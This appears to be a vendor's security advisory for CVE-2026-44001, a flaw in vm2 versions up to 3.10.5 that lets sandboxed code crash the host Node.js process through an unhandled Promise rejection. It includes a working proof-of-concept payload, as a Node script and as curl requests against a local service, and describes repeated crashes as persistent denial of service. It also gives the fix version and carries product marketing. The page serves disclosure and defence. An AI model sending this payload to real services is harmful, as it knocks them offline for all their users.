Summary
A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path.
Details
When sandboxed code creates a Promise whose executor sets Error.name to a Symbol() and then accesses .stack, V8's internal FormatStackTrace (C++) attempts Symbol.toString(), which throws a host-realm TypeError. Because this error originates inside the Promise executor and no .catch() handler is attached, it becomes an unhandled rejection that propagates to the host process.
lib/setup-sandbox.js:38,localPromisewraps the nativePromiseconstructor but does not wrap the executor in try-catch.lib/setup-sandbox.js:165-230,resetPromiseSpeciesand the.then()/.catch()overrides sanitize theonRejectedcallback chains, but do not intercept unhandled rejections originating from the executor itself.
The CVE-2026-22709 patch (v3.10.2) sanitized .then() and .catch() callback chains but left the executor-to-unhandledRejection path completely open.
Root Cause: Promise executor errors are not caught/sanitized before they can propagate as unhandled rejections to the host process, causing an immediate process crash.
allowAsync: false does not help: This setting only blocks async/await syntax and overrides .then()/.catch() to throw. The Promise constructor itself is still callable. Worse, because .catch() is blocked, any rejection from the executor is guaranteed to be unhandled, making allowAsync: false paradoxically more dangerous than true for this vulnerability.
PoC
Library-level PoC (Node.js script, primary):
const { VM } = require("vm2");
// Works with ANY allowAsync setting, both true and false
const vm = new VM({ timeout: 5000, allowAsync: false });
try {
const result = vm.run(`
new Promise(function(r, j) {
var e = new Error();
e.name = Symbol();
e.stack;
});
`);
console.log("Result:", result); // Reaches here (returns Promise object)
} catch (err) {
console.log("Caught:", err); // Never executed
}
console.log("After try-catch"); // Also prints normally
// But on the next microtask tick:
// [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string]
// Exit code: 1
//
// try-catch cannot help, vm.run() returns synchronously,
// the rejection fires asynchronously outside any catch scope.
//
// NOTE: allowAsync: false only blocks async/await syntax and
// .then()/.catch() method calls. The Promise constructor itself
// still executes, and the unhandled rejection still propagates.
// In fact, allowAsync: false makes it WORSE, .catch() is blocked,
// so the rejection is guaranteed to be unhandled.
HTTP demonstration (web service impact):
# 1. Confirm server is running
curl -s http://localhost:3000/api/execute \
-X POST -H "Content-Type: application/json" \
-d '{"code":"\"alive\""}'
# => {"output":[],"errors":[],"result":"\"alive\"","executionTime":1}
# 2. Send payload, server process will crash
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})"}'
# 3. Server is dead (connection refused until restart)
curl -s http://localhost:3000/ # => connection refused
Impact
- DoS: A single request crashes the entire host Node.js process. All concurrent users lose service immediately. In Node.js 15+, unhandled rejections terminate the process by default, no special configuration is required for the crash to occur.
- Persistent DoS despite restart policies: Even when container orchestration (Docker restart policy, Kubernetes liveness probes, PM2, etc.) automatically restarts the crashed process, an attacker can send repeated requests to crash the process again before it fully recovers. In our testing, a single
curlrequest caused the Docker container to restart (confirmed viaStartedAttimestamp change), and sending the next request immediately after restart triggered another crash. This creates a continuous denial-of-service loop where the service never becomes available to legitimate users, each restart is met with another crash before any real request can be served. - Amplification: A single HTTP request (~150 bytes) terminates the entire host process serving all users. The cost to the attacker is negligible compared to the impact.
- Scope: All applications using vm2, regardless of
allowAsyncsetting.allowAsync: falseonly blocksasync/awaitsyntax and.then()/.catch()method calls, thePromiseconstructor itself still executes, and the unhandled rejection still propagates. In fact,allowAsync: falsemakes the vulnerability worse because.catch()is blocked, guaranteeing the rejection is always unhandled.
CVE-2026-44001 has a CVSS score of 8.6 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.11.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44001? CVE-2026-44001 is a high-severity security vulnerability in vm2 (npm), affecting versions <= 3.10.5. It is fixed in 3.11.0.
- How severe is CVE-2026-44001? CVE-2026-44001 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of vm2 are affected by CVE-2026-44001? vm2 (npm) versions <= 3.10.5 is affected.
- Is there a fix for CVE-2026-44001? Yes. CVE-2026-44001 is fixed in 3.11.0. Upgrade to this version or later.
- Is CVE-2026-44001 exploitable, and should I be worried? Whether CVE-2026-44001 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44001 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44001? Upgrade
vm2to 3.11.0 or later.